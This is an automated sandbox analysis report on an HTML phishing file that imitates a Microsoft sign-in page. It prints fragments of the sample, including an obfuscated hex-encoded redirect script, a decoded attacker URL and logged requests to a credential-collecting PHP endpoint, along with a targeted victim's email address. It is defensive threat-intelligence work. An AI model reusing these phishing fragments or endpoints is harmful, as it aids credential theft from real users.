Edit tour

Windows Analysis Report
DOC-Zcns1G_.html

Overview

General Information

Sample name:	DOC-Zcns1G_.html
Analysis ID:	1431976
MD5:	1e32618fcf29bd29fe194054d4d84ca0
SHA1:	dbee4324588daf5ccbe2a9b66e15c580ddfbe640
SHA256:	149ed57259e2ed5e5b2b20e84c4ff006ca08c964794df235a933554114a9b930
Infos:

Detection

HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Yara detected HtmlPhish58

Detected javascript redirector / loader

HTML Script injector detected

HTML document with suspicious title

HTML file submission containing password form

HTML sample is only containing javascript code

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Suspicious Javascript code found in HTML file

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 1432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\DOC-Zcns1G_.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5352 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1908,i,12331105430848739512,8916628483745343975,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
DOC-Zcns1G_.html	JoeSecurity_HtmlPhish_58	Yara detected HtmlPhish_58	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_58	Yara detected HtmlPhish_58	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DOC-Zcns1G_.html

Virustotal: Detection: 9%

Perma Link

Phishing

Phishing site detected (based on favicon image match)

Source: file://	Matcher: Template: microsoft matched with high similarity
Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au	Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match

File source: 0.0.pages.csv, type: HTML

Yara detected HtmlPhish58

Source: Yara match	File source: DOC-Zcns1G_.html, type: SAMPLE
Source: Yara match	File source: 0.0.pages.csv, type: HTML

Detected javascript redirector / loader

Source: DOC-Zcns1G_.html

HTTP Parser: Low number of body elements: 0

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: New script tag found

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

Tab title: Sign in to continue

HTML sample is only containing javascript code

Source: DOC-Zcns1G_.html

HTTP Parser: <script> let x = ['3C', '73', '63', '72', '69', '70', '74', '3E', 'A', '20', '20', '20', '20', '64', '6F', '63', '75', '6D', '65', '6E', '74', '2E', '6C', '6F', '63', '61', '74', '69', '6F', '6E', '2E', '68', '72', '65', '66', '3D', '22',...

Phishing site detected (based on image similarity)

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

Matcher: Template: microsoft matched

Suspicious Javascript code found in HTML file

Source: DOC-Zcns1G_.html

HTTP Parser: document.write

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: Base64 decoded: https://iia-p.org/lh/

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: Title: Sign in to continue does not match URL

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: <input type="password" .../> found

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.34.16.106:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.34.16.106:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49768 version: TLS 1.2

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 13.107.213.41 13.107.213.41

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 23.34.16.106
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 162.222.107.40
Source: unknown	TCP traffic detected without corresponding DNS query: 162.222.107.40
Source: unknown	TCP traffic detected without corresponding DNS query: 208.111.136.128
Source: unknown	TCP traffic detected without corresponding DNS query: 208.111.136.128
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103

Source: global traffic	HTTP traffic detected: GET /lh/o.js HTTP/1.1Host: iia-p.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /16.000.28595.2/images/favicon.ico HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /lh/brand.php HTTP/1.1Host: iia-p.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /16.000.28595.2/images/favicon.ico HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ke6evYRZcpCHwR6&MD=BppByrgn HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Ke6evYRZcpCHwR6&MD=BppByrgn HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: iia-p.org
Source: global traffic	DNS traffic detected: DNS query: use.fontawesome.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown

HTTP traffic detected: POST /lh/brand.php HTTP/1.1Host: iia-p.orgConnection: keep-aliveContent-Length: 49sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_76.2.dr	String found in binary or memory: https://fontawesome.com
Source: chromecache_76.2.dr	String found in binary or memory: https://fontawesome.com/license

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.34.16.106:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.34.16.106:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49768 version: TLS 1.2

Source: classification engine

Classification label: mal100.phis.winHTML@26/17@8/6

Source: DOC-Zcns1G_.html

Virustotal: Detection: 9%

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\DOC-Zcns1G_.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1908,i,12331105430848739512,8916628483745343975,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1908,i,12331105430848739512,8916628483745343975,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

HTTP Parser: file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DOC-Zcns1G_.html	10%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
part-0013.t-0009.t-msedge.net	0%	Virustotal		Browse
iia-p.org	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://iia-p.org/lh/brand.php	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au	0%	Avira URL Cloud	safe
https://iia-p.org/lh/o.js	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
part-0013.t-0009.t-msedge.net	13.107.213.41	true	false	0%, Virustotal, Browse	unknown
www.google.com	142.250.217.164	true	false		high
iia-p.org	192.232.216.145	true	false	1%, Virustotal, Browse	unknown
use.fontawesome.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://iia-p.org/lh/o.js	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/DOC-Zcns1G_.html#suzanna.simonovic@jjswaste.com.au	true	Avira URL Cloud: safe	low
https://iia-p.org/lh/brand.php	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://fontawesome.com	chromecache_76.2.dr	false		high
https://fontawesome.com/license	chromecache_76.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.232.216.145	iia-p.org	United States	46606	UNIFIEDLAYER-AS-1US	false
142.250.217.164	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
13.107.213.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.16
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431976
Start date and time:	2024-04-26 06:27:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DOC-Zcns1G_.html
Detection:	MAL
Classification:	mal100.phis.winHTML@26/17@8/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.165.195, 142.250.217.238, 173.194.215.84, 34.104.35.123, 142.250.64.170, 172.67.142.245, 104.21.27.152, 142.250.64.138, 172.217.165.202, 172.217.15.202, 172.217.3.74, 192.178.50.42, 142.250.217.202, 142.250.217.170, 142.250.189.138, 142.251.35.234, 142.250.64.202, 192.178.50.74, 142.250.217.234, 199.232.214.172, 192.229.211.108, 142.250.64.163
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, use.fontawesome.com.cdn.cloudflare.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
239.255.255.250	https://therufus.org/download.php	Get hash	malicious	Unknown	Browse
	https://shorturl.at/lMOT7	Get hash	malicious	Unknown	Browse
	https://mcas-proxyweb.mcas.ms/certificate-checker?login=false&originalUrl=https%3A%2F%2Fapc01.safelinks.protection.outlook.com.mcas.ms%2F%3Furl%3Dhttps%253A%252F%252Fmyapps.microsoft.com%252Fsignin%252F08558f59-9161-41fc-88b3-f0434087a79c%253FtenantId%253D258ac4e4-146a-411e-9dc8-79a9e12fd6da%26data%3D05%257C01%257Cgary.fabrizio1%2540Service.wipro.com%257C8a0e1c61209e469846ba08dbe05e2370%257C258ac4e4146a411e9dc879a9e12fd6da%257C0%257C0%257C638350467206547446%257CUnknown%257CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%253D%257C3000%257C%257C%257C%26sdata%3Dp0jrjFUb%252Fusi2RID%252FGIlCE82AM9dEDuVAB4PHdDC1%252F4%253D%26reserved%3D0%26McasTsid%3D20893&McasCSRF=a0328b22f805eebb5f9c68ee3df482ea7a84065b3bbced70493927bf9ce1f085	Get hash	malicious	Unknown	Browse
